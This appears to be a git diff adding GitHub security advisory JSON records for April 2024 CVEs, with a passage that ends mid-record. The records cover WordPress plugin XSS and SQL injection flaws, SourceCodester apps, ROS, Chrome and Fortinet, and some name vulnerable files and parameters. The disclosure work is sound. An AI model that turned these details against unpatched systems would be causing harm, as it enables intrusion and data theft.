b/advisories/unreviewed/2024/04/GHSA-r4jj-84rh-4pf7/GHSA-r4jj-84rh-4pf7.json new file mode 100644 index 00000000000..06c9a8383e0 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r4jj-84rh-4pf7/GHSA-r4jj-84rh-4pf7.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r4jj-84rh-4pf7", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2436" + ], + "details": "The Lightweight Accordion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.5.16 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2436" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/lightweight-accordion/trunk/lightweight-accordion.php#L39" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3056945@lightweight-accordion/trunk&old=2889281@lightweight-accordion/trunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/545dae6b-7983-4f02-a9a0-0be8cf935a78?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r4pm-pfvm-5c7r/GHSA-r4pm-pfvm-5c7r.json b/advisories/unreviewed/2024/04/GHSA-r4pm-pfvm-5c7r/GHSA-r4pm-pfvm-5c7r.json new file mode 100644 index 00000000000..136c1a08b6c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r4pm-pfvm-5c7r/GHSA-r4pm-pfvm-5c7r.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r4pm-pfvm-5c7r", + "modified": "2024-04-06T09:31:02Z", + "published": "2024-04-06T09:31:02Z", + "aliases": [ + "CVE-2024-3362" + ], + "details": "A vulnerability was found in SourceCodester Online Library System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file admin/books/controller.php. The manipulation of the argument IBSN leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259466 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3362" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/main/Online-Library-System-04" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259466" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259466" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310426" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T07:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r537-5p8w-qx89/GHSA-r537-5p8w-qx89.json b/advisories/unreviewed/2024/04/GHSA-r537-5p8w-qx89/GHSA-r537-5p8w-qx89.json new file mode 100644 index 00000000000..25646a26f58 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r537-5p8w-qx89/GHSA-r537-5p8w-qx89.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r537-5p8w-qx89", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-31506" + ], + "details": "Sourcecodester Online Graduate Tracer System v1.0 is vulnerable to SQL Injection via the \"id\" parameter in admin/admin_cs.php.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31506" + }, + { + "type": "WEB", + "url": "https://github.com/CveSecLook/cve/issues/4" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T18:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r5c7-85f6-wq78/GHSA-r5c7-85f6-wq78.json b/advisories/unreviewed/2024/04/GHSA-r5c7-85f6-wq78/GHSA-r5c7-85f6-wq78.json new file mode 100644 index 00000000000..98cb27f709b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r5c7-85f6-wq78/GHSA-r5c7-85f6-wq78.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5c7-85f6-wq78", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-0159" + ], + "details": "Dell Alienware Command Center, versions 5.5.52.0 and prior, contain improper access control vulnerability, leading to Denial of Service on local system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0159" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000218222/dsa-2024-016-security-update-for-dell-alienware-command-center-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1107" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r5gr-4cwq-69gg/GHSA-r5gr-4cwq-69gg.json b/advisories/unreviewed/2024/04/GHSA-r5gr-4cwq-69gg/GHSA-r5gr-4cwq-69gg.json new file mode 100644 index 00000000000..2931c9a1d34 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r5gr-4cwq-69gg/GHSA-r5gr-4cwq-69gg.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5gr-4cwq-69gg", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-30733" + ], + "details": "A buffer overflow vulnerability has been discovered in the C++ components of ROS Kinetic Kame in ROS_VERSION 1 and ROS_ PYTHON_VERSION 3, allows attackers to execute arbitrary code or cause a denial of service (DoS) via improper handling of arrays or strings within these components.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30733" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30733" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r63f-6gcw-2c47/GHSA-r63f-6gcw-2c47.json b/advisories/unreviewed/2024/04/GHSA-r63f-6gcw-2c47/GHSA-r63f-6gcw-2c47.json new file mode 100644 index 00000000000..ac233724ab2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r63f-6gcw-2c47/GHSA-r63f-6gcw-2c47.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r63f-6gcw-2c47", + "modified": "2024-04-09T03:30:51Z", + "published": "2024-04-09T03:30:51Z", + "aliases": [ + "CVE-2024-25646" + ], + "details": "Due to improper validation, SAP BusinessObject Business Intelligence Launch Pad allows an authenticated attacker to access operating system information using crafted document. On successful exploitation there could be a considerable impact on confidentiality of the application.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25646" + }, + { + "type": "WEB", + "url": "https://me.sap.com/notes/3421384" + }, + { + "type": "WEB", + "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T01:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r66f-5793-9ccw/GHSA-r66f-5793-9ccw.json b/advisories/unreviewed/2024/04/GHSA-r66f-5793-9ccw/GHSA-r66f-5793-9ccw.json new file mode 100644 index 00000000000..50165bb0970 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r66f-5793-9ccw/GHSA-r66f-5793-9ccw.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r66f-5793-9ccw", + "modified": "2024-04-08T09:31:12Z", + "published": "2024-04-08T09:31:12Z", + "aliases": [ + "CVE-2024-30674" + ], + "details": "Unauthorized access vulnerability in ROS2 Iron Irwini in ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3, allows remote attackers to gain control of multiple ROS2 nodes. Unauthorized information access to these nodes could result in compromised system integrity, the execution of arbitrary commands, and disclosure of sensitive information.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30674" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30674" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T08:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r68q-m8c2-v4c3/GHSA-r68q-m8c2-v4c3.json b/advisories/unreviewed/2024/04/GHSA-r68q-m8c2-v4c3/GHSA-r68q-m8c2-v4c3.json new file mode 100644 index 00000000000..b4178e9571d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r68q-m8c2-v4c3/GHSA-r68q-m8c2-v4c3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r68q-m8c2-v4c3", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28922" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28922" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28922" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r6hr-43qj-mqc6/GHSA-r6hr-43qj-mqc6.json b/advisories/unreviewed/2024/04/GHSA-r6hr-43qj-mqc6/GHSA-r6hr-43qj-mqc6.json new file mode 100644 index 00000000000..fc8d56d800a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r6hr-43qj-mqc6/GHSA-r6hr-43qj-mqc6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r6hr-43qj-mqc6", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31260" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WisdmLabs Edwiser Bridge.This issue affects Edwiser Bridge: from n/a through 3.0.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31260" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/edwiser-bridge/wordpress-edwiser-bridge-wordpress-moodle-lms-integration-plugin-3-0-2-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r7xx-h3jw-fq3j/GHSA-r7xx-h3jw-fq3j.json b/advisories/unreviewed/2024/04/GHSA-r7xx-h3jw-fq3j/GHSA-r7xx-h3jw-fq3j.json new file mode 100644 index 00000000000..3774843d849 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r7xx-h3jw-fq3j/GHSA-r7xx-h3jw-fq3j.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r7xx-h3jw-fq3j", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-1984" + ], + "details": "The Graphene theme for WordPress is vulnerable to unauthorized access of data via meta tag in all versions up to, and including, 2.9.2. This makes it possible for unauthenticated individuals to obtain post contents of password protected posts via the generated source.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1984" + }, + { + "type": "WEB", + "url": "https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=221417%40graphene%2F2.9.3&old=164915%40graphene%2F2.9" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2f19051-fe80-469c-a514-ec3a848a4015?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r8f4-r8pc-7q4p/GHSA-r8f4-r8pc-7q4p.json b/advisories/unreviewed/2024/04/GHSA-r8f4-r8pc-7q4p/GHSA-r8f4-r8pc-7q4p.json new file mode 100644 index 00000000000..b6a177666b1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r8f4-r8pc-7q4p/GHSA-r8f4-r8pc-7q4p.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8f4-r8pc-7q4p", + "modified": "2024-04-09T21:31:57Z", + "published": "2024-04-09T21:31:57Z", + "aliases": [ + "CVE-2024-0952" + ], + "details": "The WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting plugin for WordPress is vulnerable to time-based SQL Injection via the id parameter in all versions up to, and including, 1.12.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with accounting manager or admin privileges or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0952" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3060269/erp/tags/1.13.0/modules/accounting/includes/functions/people.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3ba06f9-de51-49ea-87c1-4583e939314b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r8v8-787r-c5p4/GHSA-r8v8-787r-c5p4.json b/advisories/unreviewed/2024/04/GHSA-r8v8-787r-c5p4/GHSA-r8v8-787r-c5p4.json new file mode 100644 index 00000000000..88c95cebf7f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r8v8-787r-c5p4/GHSA-r8v8-787r-c5p4.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8v8-787r-c5p4", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-2736" + ], + "details": "The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via HTML Tags in all versions up to, and including, 4.8.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2736" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3064413/bold-page-builder/trunk/content_elements/bt_bb_headline/bt_bb_headline.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/86cf664f-5de1-4692-96b3-2fd8ae35110b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r9c4-3p3w-9g45/GHSA-r9c4-3p3w-9g45.json b/advisories/unreviewed/2024/04/GHSA-r9c4-3p3w-9g45/GHSA-r9c4-3p3w-9g45.json new file mode 100644 index 00000000000..cd9f27d39c8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r9c4-3p3w-9g45/GHSA-r9c4-3p3w-9g45.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r9c4-3p3w-9g45", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-29044" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29044" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29044" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-r9g8-4h9q-3jfp/GHSA-r9g8-4h9q-3jfp.json b/advisories/unreviewed/2024/04/GHSA-r9g8-4h9q-3jfp/GHSA-r9g8-4h9q-3jfp.json new file mode 100644 index 00000000000..669e1293001 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-r9g8-4h9q-3jfp/GHSA-r9g8-4h9q-3jfp.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r9g8-4h9q-3jfp", + "modified": "2024-04-06T15:30:27Z", + "published": "2024-04-06T15:30:27Z", + "aliases": [ + "CVE-2024-3158" + ], + "details": "Use after free in Bookmarks in Google Chrome prior to 123.0.6312.105 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3158" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/329965696" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T15:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rc3h-x674-fmwq/GHSA-rc3h-x674-fmwq.json b/advisories/unreviewed/2024/04/GHSA-rc3h-x674-fmwq/GHSA-rc3h-x674-fmwq.json new file mode 100644 index 00000000000..9b80af2ab4b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rc3h-x674-fmwq/GHSA-rc3h-x674-fmwq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rc3h-x674-fmwq", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-22448" + ], + "details": "Dell BIOS contains an Out-of-Bounds Write vulnerability. A local authenticated malicious user with admin privileges could potentially exploit this vulnerability, leading to denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22448" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000221744/dsa-2024-066" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T08:15:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rccf-3gfp-fhpv/GHSA-rccf-3gfp-fhpv.json b/advisories/unreviewed/2024/04/GHSA-rccf-3gfp-fhpv/GHSA-rccf-3gfp-fhpv.json new file mode 100644 index 00000000000..1021431e84a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rccf-3gfp-fhpv/GHSA-rccf-3gfp-fhpv.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rccf-3gfp-fhpv", + "modified": "2024-04-08T03:30:51Z", + "published": "2024-04-08T03:30:51Z", + "aliases": [ + "CVE-2024-28744" + ], + "details": "The password is empty in the initial configuration of ACERA 9010-08 firmware v02.04 and earlier, and ACERA 9010-24 firmware v02.04 and earlier. An unauthenticated attacker may log in to the product with no password, and obtain and/or alter information such as network configuration and user information. The products are affected only when running in non MS mode with the initial configuration.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28744" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/vu/JVNVU99285099" + }, + { + "type": "WEB", + "url": "https://www.furunosystems.co.jp/news/info/vulner20240401.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T01:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rcpr-8gfx-9xrm/GHSA-rcpr-8gfx-9xrm.json b/advisories/unreviewed/2024/04/GHSA-rcpr-8gfx-9xrm/GHSA-rcpr-8gfx-9xrm.json new file mode 100644 index 00000000000..068026c4ecd --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rcpr-8gfx-9xrm/GHSA-rcpr-8gfx-9xrm.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rcpr-8gfx-9xrm", + "modified": "2024-04-08T21:31:16Z", + "published": "2024-04-08T21:31:16Z", + "aliases": [ + "CVE-2024-23078" + ], + "details": "JGraphT Core v1.5.2 was discovered to contain a NullPointerException via the component org.jgrapht.alg.util.ToleranceDoubleComparator::compare(Double, Double).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23078" + }, + { + "type": "WEB", + "url": "https://gist.github.com/LLM4IG/5feabadf06a88102df316174123e2770" + }, + { + "type": "WEB", + "url": "https://github.com/jgrapht/jgrapht" + }, + { + "type": "WEB", + "url": "http://jgrapht.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rfh9-p2f9-5x7m/GHSA-rfh9-p2f9-5x7m.json b/advisories/unreviewed/2024/04/GHSA-rfh9-p2f9-5x7m/GHSA-rfh9-p2f9-5x7m.json new file mode 100644 index 00000000000..aa0252863b9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rfh9-p2f9-5x7m/GHSA-rfh9-p2f9-5x7m.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfh9-p2f9-5x7m", + "modified": "2024-04-09T21:31:57Z", + "published": "2024-04-09T21:31:57Z", + "aliases": [ + "CVE-2024-1387" + ], + "details": "The Happy Addons for Elementor plugin for WordPress is vulnerable to unauthorized access of data due to insufficient authorization on the duplicate_thing() function in all versions up to, and including, 3.10.4. This makes it possible for attackers, with contributor-level access and above, to clone arbitrary posts (including private and password protected ones) which may lead to information exposure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1387" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/trunk/classes/clone-handler.php#L58" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3064385/happy-elementor-addons/trunk/classes/clone-handler.php?contextall=1&old=3044937&old_path=%2Fhappy-elementor-addons%2Ftrunk%2Fclasses%2Fclone-handler.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aff10d5a-a2d0-461a-b52b-a25b647eaab4?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rfj2-jrc4-h4mr/GHSA-rfj2-jrc4-h4mr.json b/advisories/unreviewed/2024/04/GHSA-rfj2-jrc4-h4mr/GHSA-rfj2-jrc4-h4mr.json new file mode 100644 index 00000000000..0d26de7d8a4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rfj2-jrc4-h4mr/GHSA-rfj2-jrc4-h4mr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfj2-jrc4-h4mr", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-45590" + ], + "details": "An improper control of generation of code ('code injection') in Fortinet FortiClientLinux version 7.2.0, 7.0.6 through 7.0.10 and 7.0.3 through 7.0.4 allows attacker to execute unauthorized code or commands via tricking a FortiClientLinux user into visiting a malicious website", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45590" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-23-087" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-rfq8-469g-mx7f/GHSA-rfq8-469g-mx7f.json b/advisories/unreviewed/2024/04/GHSA-rfq8-469g-mx7f/GHSA-rfq8-469g-mx7f.json new file mode 100644 index 00000000000..d7cd23ce6e2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-rfq8-469g-mx7f/GHSA-rfq8-469g-mx7f.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfq8-469g-mx7f", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-27474" + ], + "details": "Leantime 3.0.6 is vulnerable to Cross Site Request Forgery (CSRF). This vulnerability allows malicious actors to perform unauthorized actions on behalf of authenticated users, specifically administrators.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27474" + }, + { + "type": "WEB", + "url": "https://drive.proton.me/urls/67VER05Z84#f0fXnmp8o6Y9" + }, + { + "type": "WEB", + "url": 